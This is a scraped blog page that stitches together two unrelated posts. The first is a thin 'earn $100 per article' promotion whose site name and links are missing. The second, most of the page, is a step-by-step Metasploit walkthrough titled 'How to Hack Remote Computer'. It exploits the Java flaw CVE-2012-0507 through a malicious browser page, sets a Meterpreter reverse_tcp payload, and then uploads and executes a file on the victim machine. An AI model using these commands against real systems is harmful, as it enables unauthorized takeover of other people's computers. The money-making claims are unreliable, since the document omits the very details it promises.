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How To Earn Money Online : Guaranty $100 For One Article

Everyone wants to earn money , irrespective of work , Some earn money while doing work offline some from their website etc , there are many ways to earn money which varies according to individuals condition.
I was searching effective ways to earn money online and i found something very interesting and real, out of many fake internet sites and ideas , i found this idea best among all .
Found out to be true that we can earn 100 dollars for one article with a bit of terms and condition but they are logical.
How do we do it ?
Yes the question is how do we earn money , its very simple you just have to write a article . ;)
Its not that simple as it sounds , 100 dollar for one article means you have to do smart work , yes you have to write about very unique 10 things which you think suits the tittle top 10 , for example “Top 10 weird restaurants ”   with their images and proof of their existence, proof can be the url of the link from where you got that information .
Making money with your computer
Where to submit the article and its proof ?
You have to submit your article and valid information as per requirement to . is the site about top list of everything in this world , they accept article from every deserving person and pay them 100 dollars for a single article . They are creative and combine top existing similar things around the globe in one article with complete details and share them with the whole world on their website. To achieve the goal of covering every thing they even pay for the knowledge and creativity to those who have different ideas.
For more rules and regulation of click here
How do we earn money ?
If your submitted information found out to be original and valid on internet then pays you $100 dollars via paypal to your account to publish that article on their website .
Isn’t it interesting that you have to use a bit of your brain and you can earn $100 for one article .
Those who are creative and innovative can at least try and can have a chance to win 100 dollars. make sure before submitting your article that you should have paypal account .

How to Hack Remote Computer using Metasploit by exploiting Java Vulnerability

On this post  i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).


Target OS(windows,...)
PenTesting Distro(Backtrack )
JRE 6(unpatched version)

I am assuming you already know how to set up virtual machines and how to install backtrack etc

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate". This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module.

Then type "set SRVPORT 80".
and "set URIPATH /".

Step 3: Set Payload
Type "show payloads", this will displays the list of payloads. We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] : In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine. The IP will be "192.168.56.x". E.g, let me say the ip is

Now Type in the msfconsole as "set LHOST".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine,

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
We got backdoor to the Target machine :) , now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

There you have it.. Now you are in the remote computer and you can do pretty much anything :)